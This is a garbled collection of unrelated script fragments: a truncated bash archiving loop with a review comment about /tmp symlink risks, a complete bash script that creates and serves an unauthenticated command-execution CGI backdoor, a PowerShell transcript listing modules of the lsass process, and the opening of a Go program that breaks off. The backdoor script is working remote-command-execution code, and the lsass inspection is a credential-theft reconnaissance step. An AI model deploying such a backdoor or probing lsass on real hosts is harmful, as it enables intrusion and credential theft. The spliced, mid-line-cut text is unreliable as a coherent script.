# Directory tree to scan, and the JSON file the results are collected into.
# NOTE(review): the archive has a fixed name inside the scanned tree under /tmp.
# On a shared host the redirect below writes through whatever already exists at
# that path, including a symlink; a mktemp-created file outside the tree avoids that.
SOURCE_DIRECTORY=/tmp
ARCHIVE_TO=/tmp/documents.json

# Truncate any previous archive and open the JSON array in a single write.
printf '[' > "$ARCHIVE_TO"
for FILE in $(grep -lr --exclude="$(basename $ARCHIVE_TO)" . "$SOURCE_DIRECTORY") |
# Creates an unauthenticated command-execution CGI handler and serves it with
# Python's built-in HTTP server. What this leaves on a host, for detection:
#   - an executable script at /tmp/cgi-bin/backdoor.cgi
#   - a `python -m http.server --cgi` process, which listens on port 8000 on
#     all interfaces unless --bind is given
# The handler runs its first argument ($1) as a command, unquoted and
# unvalidated, and returns the output as text/plain.
# The --cgi option is deprecated as of Python 3.13.
cd /tmp
mkdir cgi-bin

# Write the three-line handler with one here-document; the quoted delimiter
# keeps $1 and the backslashes literal at creation time.
cat > ./cgi-bin/backdoor.cgi <<'EOF'
#!/bin/bash
echo -e "Content-Type: text/plain\n\n"
echo -e $($1)
EOF

chmod +x ./cgi-bin/backdoor.cgi
python -m http.server --cgi
# Start by changing to a temporary directory | |
PS C:\WINDOWS\system32> cd \temp | |
# Run the ps command to get a list of process information for a named process (in this case we use lsass) | |
# Pipe the output to Select-Object ModuleName to limit the output to just the module names (the executable itself and its loaded DLLs)
PS C:\temp> ps -Name lsass -Module | Select-Object ModuleName | |
ModuleName | |
---------- | |
lsass.exe | |
ntdll.dll |
package main | |
import ( | |
"fmt" | |
"os" | |
"os/exec" | |
"syscall" | |
) | |
func main() { |